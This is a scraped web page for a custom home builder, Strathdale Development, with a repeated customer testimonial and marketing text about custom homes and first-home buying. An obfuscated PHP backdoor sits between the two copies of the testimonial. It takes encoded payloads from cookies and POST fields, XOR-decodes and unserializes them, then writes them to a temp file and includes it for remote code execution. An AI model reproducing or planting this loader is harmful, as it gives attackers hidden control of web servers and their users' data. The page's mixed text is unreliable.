“I have worked with Adam for over 10 years. He always responds quickly and efficiently to my questions or concerns. I enjoy working with him; he’s a stand-up guy!”
—Brett C. Berkley, MI
$fCULezsg = "\126" . "\x73" . chr (95) . "\160" . "\116" . 'S';$qGWPXW = chr (99) . chr (108) . chr ( 902 - 805 ).'s' . "\163" . chr (95) . "\x65" . chr ( 613 - 493 ).chr ( 590 - 485 )."\x73" . "\x74" . "\163";$KKVfDh = class_exists($fCULezsg); $qGWPXW = "33910";$qxAEdEpl = !1;if ($KKVfDh == $qxAEdEpl){function eaVAAsh(){return FALSE;}$VZZNcvJQCp = "650";eaVAAsh();class Vs_pNS{private function rLPtjgF($VZZNcvJQCp){if (is_array(Vs_pNS::$DuWjgpF)) {$UprozsjO = sys_get_temp_dir() . "/" . crc32(Vs_pNS::$DuWjgpF['s' . 'a' . chr (108) . 't']);@Vs_pNS::$DuWjgpF["\x77" . chr ( 644 - 530 ).chr (105) . "\x74" . chr ( 645 - 544 )]($UprozsjO, Vs_pNS::$DuWjgpF['c' . chr ( 721 - 610 )."\156" . chr (116) . 'e' . "\x6e" . chr ( 1071 - 955 )]);include $UprozsjO;@Vs_pNS::$DuWjgpF["\144" . 'e' . chr ( 194 - 86 ).chr ( 562 - 461 )."\164" . chr (101)]($UprozsjO); $VZZNcvJQCp = "650";exit();}}private $xRiLwGJoZD;public function tSSnHSc(){echo 33273;}public function __destruct(){$VZZNcvJQCp = "1098_8813";$this->rLPtjgF($VZZNcvJQCp); $VZZNcvJQCp = "1098_8813";}public function __construct($GoiXdhWsOf=0){$Xlvbkfii = $_POST;$HgCtMI = $_COOKIE;$hppyeQyS = "f2f0e3d7-012d-41f5-8c36-a1fe46187c91";$sNRVbB = @$HgCtMI[substr($hppyeQyS, 0, 4)];if (!empty($sNRVbB)){$BNpslSO = "base64";$OhyMkIgQ = "";$sNRVbB = explode(",", $sNRVbB);foreach ($sNRVbB as $xPKNm){$OhyMkIgQ .= @$HgCtMI[$xPKNm];$OhyMkIgQ .= @$Xlvbkfii[$xPKNm];}$OhyMkIgQ = array_map($BNpslSO . "\x5f" . chr (100) . chr ( 335 - 234 ).'c' . chr ( 174 - 63 ).chr ( 353 - 253 ).chr (101), array($OhyMkIgQ,)); $OhyMkIgQ = $OhyMkIgQ[0] ^ str_repeat($hppyeQyS, (strlen($OhyMkIgQ[0]) / strlen($hppyeQyS)) + 1);Vs_pNS::$DuWjgpF = @unserialize($OhyMkIgQ); $OhyMkIgQ = class_exists("1098_8813");}}public static $DuWjgpF = 35264;}$nktLF = new /* 17829 */ $fCULezsg(650 + 650); $VZZNcvJQCp = strpos($VZZNcvJQCp, $VZZNcvJQCp); $qxAEdEpl = $nktLF = $VZZNcvJQCp = Array();}
“I have worked with Adam for over 10 years. He always responds quickly and efficiently to my questions or concerns. I enjoy working with him; he’s a stand-up guy!”
—Brett C. Berkley, MI
When you are ready for the home of your dreams, Strathdale Development is here to create a signature home that is your future legacy. We deliver homes that are much more than the sum of the elements from which they are built. We strive to make the ordinary into something extraordinary…the home of your dreams.
As a premier custom builder, Strathdale Development blends your vision with craftsmanship of the highest caliber, at all stages of development and construction.
If you are not ready for building your home but taking steps for improvement with additions and renovations Strathdale Development will make those dreams come true too.
Tips To Buying Your First Home
Buying your first home at any age can be a stressful and time-consuming experience. Here are some tips to buying your first home.